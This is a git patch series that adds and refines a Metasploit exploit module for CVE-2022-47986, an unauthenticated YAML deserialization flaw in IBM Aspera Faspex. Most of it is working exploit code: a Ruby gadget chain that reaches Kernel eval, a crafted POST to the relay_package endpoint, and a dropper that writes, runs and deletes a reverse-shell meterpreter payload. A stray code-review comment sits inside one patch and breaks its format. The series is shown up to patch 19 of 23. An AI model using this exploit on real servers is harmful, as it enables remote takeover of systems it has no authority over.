From 7b777a88870c6b9ddca62e5ddd71376c06abc64b Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Thu, 9 Mar 2023 17:06:58 +0000
Subject: [PATCH 01/23] [exploit][RCE][CVE-2022-47986] IBM aspera faspex YAML deserialization
---
 ..._aspera_faspex_rce_yaml_deserialization.rb | 143 ++++++++++++++++++
 1 file changed, 143 insertions(+)
 create mode 100644 modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
new file mode 100644
index 000000000000..0da584f38639
--- /dev/null
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -0,0 +1,143 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::EXE
+ include Msf::Exploit::FileDropper
+ include Msf::Exploit::Remote::CheckModule
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(
+ update_info(
+ info,
+ 'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability',
+ 'Description' => %q{
+ This module exploit an unauthenticated RCE vulnerability
+ which exists in IBM Aspera Faspex version 4.4.1 (CVE-2022-47986).
+ },
+ 'References' => [
+ ['CVE', '2022-47986'],
+ ['URL', 'https://www.ibm.com/support/pages/node/6952319'],
+ ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'],
+ ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'],
+ ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'],
+ ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'],
+ ],
+ 'Author' => [
+ 'ohnonoyesyes' # POC
+ 'Maurice LAMBERT', # Metasploit auxiliary module
+ ],
+ 'DisclosureDate' => '',
+ 'License' => MSF_LICENSE,
+ 'Platform' => ['unix', 'linux'],
+ 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
+ 'DefaultOptions' => {
+ 'CheckModule' => '',
+ 'Action' => 'CHECK_RCE',
+ 'RPORT' => 443,
+ 'SSL' => true
+ },
+ 'Targets' => [
+ [
+ 'Automatic (Dropper)',
+ {
+ 'Platform' => 'linux',
+ 'Arch' => [ARCH_X64, ARCH_X86],
+ 'Type' => :linux_dropper,
+ 'DefaultOptions' => {
+ 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',
+ 'DisablePayloadHandler' => 'false'
+ }
+ }
+ ],
+ ],
+ 'DefaultTarget' => 0,
+ 'Notes' => {
+ 'Stability' => [CRASH_SAFE],
+ 'Reliability' => [REPEATABLE_SESSION],
+ 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+ }
+ )
+ )
+ end
+
+ def cmd_unix_generic?
+ datastore['PAYLOAD'] == 'cmd/unix/generic'
+ end
+
+ def execute_command(command, _opts = {})
+ exploit = %q#
+---
+- !ruby/object:Gem::Installer
+ i: x
+- !ruby/object:Gem::SpecFetcher
+ i: y
+- !ruby/object:Gem::Requirement
+ requirements:
+ !ruby/object:Gem::Package::TarReader
+ io: &1 !ruby/object:Net::BufferedIO
+ io: &1 !ruby/object:Gem::Package::TarReader::Entry
+ read: 0
+ header: "pew"
+ debug_output: &1 !ruby/object:Net::WriteAdapter
+ socket: &1 !ruby/object:PrettyPrint
+ output: !ruby/object:Net::WriteAdapter
+ socket: &1 !ruby/module "Kernel"
+ method_id: :eval
+ newline: "throw `command`"
+ buffer: {}
+ group_stack:
+ - !ruby/object:PrettyPrint::Group
+ break: true
+ method_id: :breakable
+ #.gsub(/command/, command).gsub(/\n/, "\\n").gsub(/"/, "\\\"")
+
+ payload = %q#{
+ "package_file_list": [
+ "/"
+ ],
+ "external_emails": exploit,
+ "package_name": "assetnote_pack",
+ "package_note": "hello from assetnote team",
+ "original_sender_name": "assetnote",
+ "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+ "metadata_human_readable": "Yes",
+ "forward": "pew",
+ "metadata_json": '{}',
+ "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+ "delivery_sender_name": "assetnote",
+ "delivery_title": "TEST",
+ "delivery_note": "TEST",
+ "delete_after_download": True,
+ "delete_after_download_condition": "IDK",
+}#.gsub(/exploit/, exploit)
+
+ response = send_request_raw({
+ 'method' => "POST",
+ 'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'),
+ 'data' => payload,
+ })
+ if response && response.body
+ return response.body
+ end
+
+ false
+ end
+
+ def exploit
+ file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
+ cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"
+
+ print_status(message("Sending #{datastore['PAYLOAD']} command payload"))
+ vprint_status(message("Generated command payload: #{cmd}"))
+
+ execute_command(cmd)
+
+ register_file_for_cleanup file_name
+ end
+end
From 5a5ac5755be63554b88a6a1b1244a8ba440f89dc Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Thu, 9 Mar 2023 18:57:01 +0000
Subject: [PATCH 02/23] Fix: exploit is a JSON string
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 0da584f38639..7fca413c6590 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -101,7 +101,7 @@ def execute_command(command, _opts = {})
 "package_file_list": [
 "/"
 ],
- "external_emails": exploit,
+ "external_emails": "exploit",
 "package_name": "assetnote_pack",
 "package_note": "hello from assetnote team",
 "original_sender_name": "assetnote",
From 50ca746e836ac78fdadebae9c9a7ae3f4e353b33 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 10 Mar 2023 22:24:42 +0000
Subject: [PATCH 03/23] Fix: syntax error
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 7fca413c6590..19826898f138 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
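Review bot: `exploit` discards the value returned by `execute_command`, so the `false` branch at the end of `execute_command` (no response, or a response without a body) is never reported and the run ends with no indication of what happened; `fail_with(Failure::Unreachable, 'No response from the target') unless execute_command(cmd)` would surface it. The locals named `exploit` and `payload` inside `execute_command` shadow the `exploit` and `payload` methods the module inherits from `Msf::Exploit`, which makes the body harder to read and is still present in the last patch of this series; `yaml_doc` and `form_fields` would be clearer. `Msf::Exploit::Remote::CheckModule` is also included with `'CheckModule' => ''` and no `check` method is defined, so the `check` command has nothing to run.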
@@ -29,7 +29,7 @@ def initialize(info = {})
 ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'],
 ],
 'Author' => [
- 'ohnonoyesyes' # POC
+ 'ohnonoyesyes', # POC
 'Maurice LAMBERT', # Metasploit auxiliary module
 ],
 'DisclosureDate' => '',
From 91a834f9c1b6116d2a46cd2658c7b7487c0c9d5b Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 10 Mar 2023 22:38:24 +0000
Subject: [PATCH 04/23] Fix: not implemented method
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 19826898f138..3ff9bfea08e1 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -133,8 +133,8 @@ def exploit
 file_name = "/tmp/#{Rex::Text.rand_text_alpha(4..8)}"
 cmd = "echo #{Rex::Text.encode_base64(generate_payload_exe)} | base64 -d > #{file_name}; chmod +x #{file_name}; #{file_name}; rm -f #{file_name}"
- print_status(message("Sending #{datastore['PAYLOAD']} command payload"))
- vprint_status(message("Generated command payload: #{cmd}"))
+ print_status("Sending #{datastore['PAYLOAD']} command payload")
+ vprint_status("Generated command payload: #{cmd}")
 execute_command(cmd)
From 4382277207138c6496a45af9e186a9c835a890cd Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 10 Mar 2023 22:42:05 +0000
Subject: [PATCH 05/23] Fix: Payload JSON syntax
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 3ff9bfea08e1..8ceaafa70faf 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -108,13 +108,13 @@ def execute_command(command, _opts = {})
 "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
 "metadata_human_readable": "Yes",
 "forward": "pew",
- "metadata_json": '{}',
+ "metadata_json": "{}",
 "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
 "delivery_sender_name": "assetnote",
 "delivery_title": "TEST",
 "delivery_note": "TEST",
 "delete_after_download": True,
- "delete_after_download_condition": "IDK",
+ "delete_after_download_condition": "IDK"
 }#.gsub(/exploit/, exploit)
 response = send_request_raw({
From de886f28276fc974218786a5ed1bbd564a06e592 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 10 Mar 2023 22:47:00 +0000
Subject: [PATCH 06/23] Fix: JSON syntax
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 8ceaafa70faf..a07d84320dce 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -113,7 +113,7 @@ def execute_command(command, _opts = {})
 "delivery_sender_name": "assetnote",
 "delivery_title": "TEST",
 "delivery_note": "TEST",
- "delete_after_download": True,
+ "delete_after_download": true,
 "delete_after_download_condition": "IDK"
 }#.gsub(/exploit/, exploit)
From ab0ad1939808c0ebc5a816d21041b6ae08ca835b Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 10 Mar 2023 22:56:58 +0000
Subject: [PATCH 07/23] Linting
---
 .../http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index a07d84320dce..5d45dde30fb2 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -32,7 +32,7 @@ def initialize(info = {})
 'ohnonoyesyes', # POC
 'Maurice LAMBERT', # Metasploit auxiliary module
 ],
- 'DisclosureDate' => '',
+ 'DisclosureDate' => '2023-02-02',
 'License' => MSF_LICENSE,
 'Platform' => ['unix', 'linux'],
 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
@@ -95,7 +95,7 @@ def execute_command(command, _opts = {})
 - !ruby/object:PrettyPrint::Group
 break: true
 method_id: :breakable
- #.gsub(/command/, command).gsub(/\n/, "\\n").gsub(/"/, "\\\"")
+ #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"')
 payload = %q#{
 "package_file_list": [
@@ -118,9 +118,9 @@ def execute_command(command, _opts = {})
 }#.gsub(/exploit/, exploit)
 response = send_request_raw({
- 'method' => "POST",
+ 'method' => 'POST',
 'uri' => normalize_uri(datastore['TARGETURI'], '/aspera/faspex/package_relay/relay_package'),
- 'data' => payload,
+ 'data' => payload
 })
 if response && response.body
 return response.body
From 4b978b61e4744a72bef4e1a55506a0f1256fd4f5 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Thu, 16 Mar 2023 21:30:48 +0000
Subject: [PATCH 08/23] Remove unused function
Co-authored-by: dwelch-r7
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 3 ---
 1 file changed, 3 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 5d45dde30fb2..98598c4ac51c 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -66,9 +66,6 @@ def initialize(info = {})
 )
 end
- def cmd_unix_generic?
- datastore['PAYLOAD'] == 'cmd/unix/generic'
- end
 def execute_command(command, _opts = {})
 exploit = %q#
From 23add713d0ed3463d60808e851004be53762cd9b Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 17 Mar 2023 12:16:15 +0000
Subject: [PATCH 09/23] Payload random values
---
 .../ibm_aspera_faspex_rce_yaml_deserialization.rb | 13 +++++++------
 1 file changed, 7 insertions(+), 6 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 98598c4ac51c..6f429aa811cb 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -94,22 +94,23 @@ def execute_command(command, _opts = {})
 method_id: :breakable
 #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"')
+ uuid = SecureRandom.uuid
 payload = %q#{
 "package_file_list": [
 "/"
 ],
 "external_emails": "exploit",
 "package_name": "assetnote_pack",
- "package_note": "hello from assetnote team",
- "original_sender_name": "assetnote",
- "package_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+ "package_note": ,
+ "original_sender_name": Rex::Text.rand_name(),
+ "package_uuid": uuid,
 "metadata_human_readable": "Yes",
 "forward": "pew",
 "metadata_json": "{}",
- "delivery_uuid": "d7cb6601-6db9-43aa-8e6b-dfb4768647ec",
+ "delivery_uuid": uuid,
 "delivery_sender_name": "assetnote",
- "delivery_title": "TEST",
- "delivery_note": "TEST",
+ "delivery_title": Rex::Text.rand_text_alphanumeric(4),
+ "delivery_note": Rex::Text.rand_text_alphanumeric(12),
 "delete_after_download": true,
 "delete_after_download_condition": "IDK"
 }#.gsub(/exploit/, exploit)
From 82749ac7ad0599b6973d2735997ccf02b665ad26 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 17 Mar 2023 12:28:59 +0000
Subject: [PATCH 10/23] Forgotten random value
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 6f429aa811cb..392561121467 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -101,7 +101,7 @@ def execute_command(command, _opts = {})
 ],
 "external_emails": "exploit",
 "package_name": "assetnote_pack",
- "package_note": ,
+ "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15),
 "original_sender_name": Rex::Text.rand_name(),
 "package_uuid": uuid,
 "metadata_human_readable": "Yes",
From 4b87070073ece60372a37caf5a66a6eb26abe364 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 17 Mar 2023 12:30:35 +0000
Subject: [PATCH 11/23] Payload random value
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 392561121467..458297802c0e 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -108,7 +108,7 @@ def execute_command(command, _opts = {})
 "forward": "pew",
 "metadata_json": "{}",
 "delivery_uuid": uuid,
- "delivery_sender_name": "assetnote",
+ "delivery_sender_name": Rex::Text.rand_name(),
 "delivery_title": Rex::Text.rand_text_alphanumeric(4),
 "delivery_note": Rex::Text.rand_text_alphanumeric(12),
 "delete_after_download": true,
From 918cddb66242938cc6ab3bc42ad161ca0d3bff3d Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 18:24:53 +0000
Subject: [PATCH 12/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 458297802c0e..7437d9258b43 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -17,8 +17,8 @@ def initialize(info = {})
 info,
 'Name' => 'IBM Aspera Faspex YAML deserialization vulnerability',
 'Description' => %q{
- This module exploit an unauthenticated RCE vulnerability
- which exists in IBM Aspera Faspex version 4.4.1 (CVE-2022-47986).
+ This module exploits an unauthenticated YAML deserialization vulnerability
+ which exists in IBM Aspera Faspex version 4.4.2 Patch Level 1 and below (CVE-2022-47986).
 },
 'References' => [
 ['CVE', '2022-47986'],
From a26d38c3184624137c652f97d9c42db7691e414d Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 18:25:06 +0000
Subject: [PATCH 13/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 7437d9258b43..5825dc1d2b6f 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -26,7 +26,7 @@ def initialize(info = {})
 ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2022-47986'],
 ['URL', 'https://github.com/ohnonoyesyes/CVE-2022-47986/blob/main/poc.py'],
 ['URL', 'https://thehackernews.com/2023/03/icefire-linux-ransomware.html'],
- ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis?source=mastodon'],
+ ['URL', 'https://attackerkb.com/topics/jadqVo21Ub/cve-2022-47986/rapid7-analysis'],
 ],
 'Author' => [
 'ohnonoyesyes', # POC
From 830905a3d47e85fee744730eacfda56398312ebe Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 18:25:38 +0000
Subject: [PATCH 14/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 --
 1 file changed, 2 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 5825dc1d2b6f..da89db714c41 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -37,8 +37,6 @@ def initialize(info = {})
 'Platform' => ['unix', 'linux'],
 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
 'DefaultOptions' => {
- 'CheckModule' => '',
- 'Action' => 'CHECK_RCE',
 'RPORT' => 443,
 'SSL' => true
 },
From 4e8236d5c53d1de84a9aec6bf0736a700e9a1c9d Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 18:27:26 +0000
Subject: [PATCH 15/23] Update modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
Co-authored-by: Shelby Pace <40177151+space-r7@users.noreply.github.com>
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 1 -
 1 file changed, 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index da89db714c41..0788a083837b 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -134,6 +134,5 @@ def exploit
 execute_command(cmd)
- register_file_for_cleanup file_name
 end
 end
From 0afbe404fb86129700fec11252dc1f20df264231 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 18:40:21 +0000
Subject: [PATCH 16/23] Fix: random UUID in the payload
---
 .../linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 0788a083837b..5f7912db3df5 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -111,7 +111,7 @@ def execute_command(command, _opts = {})
 "delivery_note": Rex::Text.rand_text_alphanumeric(12),
 "delete_after_download": true,
 "delete_after_download_condition": "IDK"
-}#.gsub(/exploit/, exploit)
+}#.gsub(/exploit/, exploit).gsub(/uuid/, uuid)
 response = send_request_raw({
 'method' => 'POST',
From ed9a98e6e81dfde0dfe22e74a2836e7de78f4f56 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 18:43:31 +0000
Subject: [PATCH 17/23] Fix: replace uuid string
---
 .../http/ibm_aspera_faspex_rce_yaml_deserialization.rb | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 5f7912db3df5..4b0738a09ddc 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -101,17 +101,17 @@ def execute_command(command, _opts = {})
 "package_name": "assetnote_pack",
 "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15),
 "original_sender_name": Rex::Text.rand_name(),
- "package_uuid": uuid,
+ "package_uuid": random_uuid,
 "metadata_human_readable": "Yes",
 "forward": "pew",
 "metadata_json": "{}",
- "delivery_uuid": uuid,
+ "delivery_uuid": random_uuid,
 "delivery_sender_name": Rex::Text.rand_name(),
 "delivery_title": Rex::Text.rand_text_alphanumeric(4),
 "delivery_note": Rex::Text.rand_text_alphanumeric(12),
 "delete_after_download": true,
 "delete_after_download_condition": "IDK"
-}#.gsub(/exploit/, exploit).gsub(/uuid/, uuid)
+}#.gsub(/exploit/, exploit).gsub(/random_uuid/, uuid)
 response = send_request_raw({
 'method' => 'POST',
From d9fa3de136e90a8696885016d7a7fa20722a24d3 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 18:54:53 +0000
Subject: [PATCH 18/23] Use string interpolation
---
 ..._aspera_faspex_rce_yaml_deserialization.rb | 26 +++++++++----------
 1 file changed, 13 insertions(+), 13 deletions(-)
diff --git a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
index 4b0738a09ddc..849b7b7dead5 100644
--- a/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
+++ b/modules/exploits/linux/http/ibm_aspera_faspex_rce_yaml_deserialization.rb
@@ -66,7 +66,7 @@ def initialize(info = {})
 def execute_command(command, _opts = {})
- exploit = %q#
+ exploit = %Q(
 ---
 - !ruby/object:Gem::Installer
 i: x
@@ -84,34 +84,34 @@ def execute_command(command, _opts = {})
 output: !ruby/object:Net::WriteAdapter
 socket: &1 !ruby/module "Kernel"
 method_id: :eval
- newline: "throw `command`"
+ newline: "throw `#{command}`"
 buffer: {}
 group_stack:
 - !ruby/object:PrettyPrint::Group
 break: true
 method_id: :breakable
- #.gsub(/command/, command).gsub(/\n/, '\n').gsub(/"/, '\"')
+ ).gsub(/\n/, '\n').gsub(/"/, '\"')
 uuid = SecureRandom.uuid
- payload = %q#{
+ payload = %Q({
 "package_file_list": [
 "/"
 ],
- "external_emails": "exploit",
+ "external_emails": "#{exploit}",
 "package_name": "assetnote_pack",
- "package_note": Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15),
- "original_sender_name": Rex::Text.rand_name(),
- "package_uuid": random_uuid,
+ "package_note": "#{Rex::Text.rand_text(50, bad = '', chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789' + ' ' * 15)}",
+ "original_sender_name": "#{Rex::Text.rand_name()}",
+ "package_uuid": "#{uuid}",
 "metadata_human_readable": "Yes",
 "forward": "pew",
 "metadata_json": "{}",
- "delivery_uuid": random_uuid,
- "delivery_sender_name": Rex::Text.rand_name(),
- "delivery_title": Rex::Text.rand_text_alphanumeric(4),
- "delivery_note": Rex::Text.rand_text_alphanumeric(12),
+ "delivery_uuid": "#{uuid}",
+ "delivery_sender_name": "#{Rex::Text.rand_name()}",
+ "delivery_title": "#{Rex::Text.rand_text_alphanumeric(4)}",
+ "delivery_note": "#{Rex::Text.rand_text_alphanumeric(12)}",
 "delete_after_download": true,
 "delete_after_download_condition": "IDK"
-}#.gsub(/exploit/, exploit).gsub(/random_uuid/, uuid)
+})
 response = send_request_raw({
 'method' => 'POST',
From d05fcc0579c1850a798da8254868ea1acced68de Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Fri, 28 Apr 2023 19:31:00 +0000
Subject: [PATCH 19/23] Use metasploit command stagers instead of custom payload
---
 ..._aspera_faspex_rce_yaml_deserialization.rb | 25 ++++++++-----------
 1 file changed, 11 insertions(+), 14 deletions(-)
